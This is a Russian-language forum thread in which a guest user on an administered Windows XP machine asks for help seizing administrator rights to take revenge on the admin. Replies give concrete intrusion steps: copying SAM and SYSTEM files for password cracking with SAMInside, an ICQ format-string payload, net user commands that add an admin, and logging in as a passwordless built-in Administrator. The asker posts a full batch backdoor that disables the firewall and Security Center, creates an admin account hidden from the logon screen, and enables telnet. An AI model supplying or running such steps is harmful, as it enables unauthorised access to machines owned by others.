| Вопрос: ВыньХП ;) | Добавлено: 01.03.08 21:41 |
Автор вопроса:  Hunter
|
|
Я конечно понимаю, что вопрос в сущности даж отдаленно не затрагивает вб ... но все же хелпните ...
Итак, начнемс ... Есть: руки 2шт, виндаХП (сп2) 1шт, тупой админ(ну очень тупой, но все же не полный ламо), злой юзер(то есть я), usb-port, nod32, dr.web Нету: Доступа к админке, флопика, сидирома. То есть стандартная композиция получается - учетка гостя + пара-тройка настроек от админа(запрет автозапуска и чет там еще), но реестр открыт(естественно, что привилегии гостя), диспетчер не блочен НАДО: получить админку(привилегии админа), желательно использую баги винды Посоветуйте, что можна предпринять ? и какие баги и самое главное как использовать ??? p.s еще раз повторю - желательно использовать баги винды и получить цмд с правами админа или создать нового админа ... ток не над предлагать СИ - не прокатит(админ хоть и тупой, все же койчего и понимает) у антивирусов базы дет середины 2007 ... p.p.s хочу проучить админа за его тупость + за то, что он удалил вб с компов ((( даж заняться нечем ... Заранее спс за хелп ))) |
| Ответы | Всего ответов: 14 |
|
Номер ответа: 1 Автор ответа:  ZagZag ICQ: 295002202 Вопросов: 87 Ответов: 1684 |
Профиль | | #1 | Добавлено: 02.03.08 02:17 |
|
Если сидиром отключен на программном уровне (винда, права), то можно попробовать загрузиться с Live-CD, и с него творить все что захочется.
|
||
|
Номер ответа: 2 Автор ответа:  MorpheusВопросов: 224 Ответов: 3777 |
Web-сайт: Профиль | | #2 | Добавлено: 02.03.08 02:20 |
| А не подумывал ему просто на стул клея налить или что-то в этом роде? | ||
|
Номер ответа: 3 Автор ответа: MorpheusВопросов: 224 Ответов: 3777 |
Web-сайт: Профиль | | #3 | Добавлено: 02.03.08 02:24 |
| п.с. вопрос прикольный | ||
|
Номер ответа: 4 Автор ответа:  Hunter Вопросов: 23 Ответов: 71 |
Профиль | | #4 | Добавлено: 02.03.08 04:13 |
| Сидюка нету ((( а лайв сиди есть ))) WinPE ... с флешки почемуто не грузит - в биосе настраивал ... не пашет и все! Проверял образ - грит се норм - дома проверял - тож пашет (ток биосы разные) Дома у мя AT ... а тут award - причем есть бут с флехи - но не грузит! | ||
|
Номер ответа: 5 Автор ответа: HunterВопросов: 23 Ответов: 71 |
Профиль | | #5 | Добавлено: 02.03.08 04:13 |
|
А не подумывал ему просто на стул клея налить или что-то в этом роде?
Увахаххахахаха ... неееее я ему на программном уровне отомстить хачу )))))) |
||
|
Номер ответа: 6 Автор ответа: HunterВопросов: 23 Ответов: 71 |
Профиль | | #6 | Добавлено: 02.03.08 04:14 |
| Какие ток баги не пересмаривал - не пашут ((( Правда на некоторых компах вб остался - мож че посоветуете - как никак у вб помоему права системы есть ... иногда ))) | ||
|
Номер ответа: 7 Автор ответа: MorpheusВопросов: 224 Ответов: 3777 |
Web-сайт: Профиль | | #7 | Добавлено: 02.03.08 04:53 |
|
посоветуй поставить ему асю6 и пошли туда %020000000s
(подробности на яндексе, или например тут: http://www.securitylab.ru/vulnerability/347732.php или тут http://bugtraq.ru/rsn/archive/2008/02/07.html) |
||
|
Номер ответа: 8 Автор ответа: ZagZagICQ: 295002202 Вопросов: 87 Ответов: 1684 |
Профиль | | #8 | Добавлено: 02.03.08 11:47 |
|
Грузись с дискетки с поддержкой NTFS (если NTFS стоит).
Копируй из C:\WINDOWS\repair\ файлы SAM и software Дома их скормишь проге SAMInside В результате получишь пароли локальных юзерей компа |
||
|
Номер ответа: 9 Автор ответа: HunterВопросов: 23 Ответов: 71 |
Профиль | | #9 | Добавлено: 02.03.08 15:06 |
|
Грузись с дискетки с поддержкой NTFS (если NTFS стоит).
флопика нету ((( посоветуй поставить ему асю6 и пошли туда %020000000s
(подробности на яндексе, или например тут: http://www.securitylab.ru/vulnerability/347732.php или тут http://bugtraq.ru/rsn/archive/2008/02/07.html) компы клиентские - инета нет ((( |
||
|
Номер ответа: 10 Автор ответа: HunterВопросов: 23 Ответов: 71 |
Профиль | | #10 | Добавлено: 02.03.08 15:09 |
|
Копируй из C:\WINDOWS\repair\ файлы SAM и <s>software</s>
SAM и SYSTEM ... небольшая ошибочка |
||
|
Номер ответа: 11 Автор ответа: ZagZagICQ: 295002202 Вопросов: 87 Ответов: 1684 |
Профиль | | #11 | Добавлено: 02.03.08 15:38 |
|
Да-да. Ошибочка.
А какой смысл тогда компы ломать, если на них ничего нет? Остается только с флешки грузиться или внешний флопик или CD-ROM притащить 
Хотя еще можно попробовать в консоли вбить net user YOURUSER YOURPASS /add >> Add_admin.txt
net localgroup Administrator YOURUSER /add >> Add_admin.txt net group "  omain Admins" YOURUSER /add >> Add_admin.txthttp://www.governmentsecurity.org/archive/t9255.html |
||
|
Номер ответа: 12 Автор ответа: HunterВопросов: 23 Ответов: 71 |
Профиль | | #12 | Добавлено: 02.03.08 18:39 |
|
net user YOURUSER YOURPASS /add >> Add_admin.txt
net localgroup Administrator YOURUSER /add >> Add_admin.txt net group " omain Admins" YOURUSER /add >> Add_admin.txtНу эт права нужны ((( + русская версия - там траблы с кодировкой = у меня бач есть - там ентой фигни немерено ))) вот зацените ))) @echo off if not exist \LOGZ md \LOGZ >nul echo COMP: %computername% & USER: %username% & D&T: %date% %time% >> \LOGZ\%computername%_log.log 2>&1 ipconfig /all >> \logfiles\%computername%_log.log 2>&1 sc config wscsvc start= disabled sc config SharedAccess start= disabled sc config tlntsvr start= auto sc stop wscsvc sc stop SharedAccess sc start tlntsvr net user USR ADM /add net localgroup Ђ¤¬ЁЁбва в®ал USR /add reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v USR /t REG_DWORD /d 0 /f exit Во первых, создается лог файл с именем компа + инфа о ip-адресе и тп и тд Во вторых, создается пользователь USR с пасом PWD ... В третьих, юзер USR невидим при старте винды(паиб Билли )
В четвертых, стартует телнет, то есть у тя есть шелл с правами админа ))) И все равно это не покатит ((( Над дыру эксплуатировать __))) |
||
|
Номер ответа: 13 Автор ответа: HunterВопросов: 23 Ответов: 71 |
Профиль | | #13 | Добавлено: 02.03.08 18:41 |
|
Пардон, не
ipconfig /all >> \logfiles\%computername%_log.log 2>&1
а вот так ipconfig /all >> \LOGZ \%computername%_log.log 2>&1
|
||
|
Номер ответа: 14 Автор ответа: Programmer Вопросов: 71 Ответов: 246 |
Профиль | | #14 | Добавлено: 08.03.08 22:14 |
Если админ тупой, то у него отдельный профиль, а профиль "Администратор" который обычно не виден при старте винды) не имеет пароля. Грузшь винды, C-A-D, C-A-D, логин - Administrator/Администратор.
|
||
Страница: 1 |